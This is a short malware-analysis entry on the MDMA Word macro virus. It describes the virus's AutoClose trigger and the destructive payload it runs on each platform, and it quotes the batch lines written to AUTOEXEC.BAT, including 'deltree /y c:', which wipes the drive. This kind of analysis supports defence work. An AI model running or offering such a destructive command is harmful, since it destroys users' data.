Macro Virus: Wordmacro/MDMA

The MDMA macro virus consists of a single macro, AutoClose. It infects under all versions of WinWord 6.0 and above; i.e., both Mac and PC platforms.

On the 1st of any month activates its payload. The payload depends on the platform.

1. On Macs, the virus intends to delete all files in the current folder. Due to a bug, a syntax error occurs and no damage is done.

2. On WinNT, the virus deletes all files in the current directory and the file c:\shmk.

3. On Windows 3.1, the virus deletes the file c:\shmk and overwrites C:\AUTOEXEC.BAT with the following commands:

   	@echo off
   	deltree /y c:
   	@echo You have just been phucked over by a virus
   

4. On Win95, the virus deletes the files c:\shmk, c:\windows\*.hlp, and c:\windows\system\*.cpl and sets in the Registry the Accessibility options Stickykeys and HighContrast to ON, and the execution of login scripts during network logon to OFF. Due to a bug, it doesn't succeed in setting the HighContrast option.

After performing one of the above actions, the virus displays a message box with the following contents:

You are infected with MDMA_DMV. 
Brought to you by MDMA (Many Delinquent Modern Anarchists).

This analysis was based on information provided by Vesselin Bontchev, Frisk Software.